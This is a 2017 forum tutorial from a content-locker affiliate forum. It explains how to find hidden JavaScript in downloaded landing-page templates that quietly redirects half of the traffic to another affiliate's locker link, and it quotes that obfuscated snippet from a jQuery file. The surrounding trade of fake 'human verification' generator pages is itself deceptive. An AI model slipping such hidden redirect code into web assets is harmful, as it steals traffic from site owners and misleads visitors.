Announcement Protect Your Self From Sneaky Landing Page Redirects (Tutorial)
2017-08-14, 09:07 PM,
#1
After catching multiple infected Landing Pages in the section we decided to make this thread to help protect the users from using any infected LP that redirects a certain % of traffic to a different locker.

This should be short and simple
I would also like point out that if you want to report any infected Landing Pages / Scripts, you should send the suspicious code in a quote alongside a URL of the thread through a PM to:
HawkEye
Watt
LB'Decoy

So now let me begin explaining the tutorial and i'll be using a recent Infected Landing Page as an example.

Once you download the LP zip file & extract it, you should always look for the index.html file and open it in a notepad / Sublime Text or any other similar utility.

But in this example the creator of the LP had 2 index files

[Image: -XJ7F6BlQcq7iqf5-4XVog.png]

Opening the first Index file will redirect to the real LP which is in Index-2.html
Which is where you should look for the locker code which most of the time it's linked with a button/image:

[Image: 6sLa_R-rQ92tosNJtL2Tjg.png]

As you can see, this is not a "OnClick" prompt which means, as soon as anyone clicks on the button they'll be redirected to a link instead.

Notice how the ID is named as
Code:
first-step-button-verify
as long as it's there that means it's linked to a JavaScript file.

So what you need to do is to search for ANY Javascript file in the LP's documents and only search for that ID (first-step-button-verify)

After filtering the document according to files type i can see all the javascript files above each other, the first thing my eyes looked at is this file:

[Image: cVxKRZxkQc6wdC4KqScEkQ.png]

Why Jquery? cause i caught most of the suspicious codes in so much infected LPs in such files, but that doesn't mean that you should not look on the other files as some people would make the extra step & hide the redirection in a different file.

So after opening the Jquery file i saw this:

[Image: wkzCnkQLR-aInWsGQkOzdQ.png]

Quote:if(document.getElementById("first-step-button-verify").href!="https://www.areyouahuman.co/cl.php?id=bdb328282d7dd9d25a1b26e8009b26e1") {
0>window.location.href.toString().indexOf("http://unlimitedapps.online/human-verification/generator.html")&&0==Math.floor(100*Math.random()/50)&&(window.onload=function(){document.getElementById("first-step-button-verify").href="https://www.humanverify.net/cl.php?id=49dc4de106fa33cad1e0fe33976fb1e2"});
}

Which is exactly what we were looking for!
After finding it you should try & read the code & find any suspicious lines such as links/a code for redirecting to Another file, and so on!
And for this example i found a code of a string that's linked to another new locker link

Which is by far means that this code was meant to redirect %50 of the traffic to the 2nd locker link if the "First" locker link was removed/replaced.

I went ahead and tested the page and whenever you change the locker link in the "Index-2.html" page, every time you load the page twice the "2nd" link locker which was found in the Jquery file will appear instead of yours.

So the fix for this is to simply delete the whole "Jquery" file which contains the suspicious code.

IMO once you find a infected LP, i wouldn't recommend using it even after you clean it.

If you guys have any questions, i'll be happy to answer you through PM

Stay safe & as i sometimes say, if you ever earn enough $$ you should step up and invest money in your Landing Pages.

Have a great day!

Latest Thanks - View all

mrpfatsch(2017-12-08 04:29 PM) Watt(2017-08-15 10:24 AM) 

If You Think That Any Of The Staff Team Is Using Their Privileges In A Wrong Manner
You Can Always Contact The Admin → HawkEye


Related Threads
Thread Author Replies Views Last Post
  OGAds - Weekly Payments - Landing Pages - Mentor - Hot Offers OGAds 404 56,955 Yesterday, 02:16 PM
Last Post: OGAds
  Landing Pages karimsaid5 7 235 2018-01-15, 09:06 PM
Last Post: karimsaid5
  Review my Instagram landing page (Bonus 20 followers inside) rinaldohack 47 2,063 2018-01-10, 12:44 PM
Last Post: peterpilp
  WP landing page upload problem justinmartin 6 282 2017-12-21, 03:26 AM
Last Post: HeAdWi9H
  Have a 2.1m IG network, any tips on OGAds when it comes to landing pages/offers? InstagramGod 6 339 2017-12-20, 03:48 AM
Last Post: Nem





About Us | Contact Us | CPA Elites | Advertise | Stats | Staff Team

© 2013-2018 CPA Elites Ltd
Enhanced by MyBB and WallBB
Return to top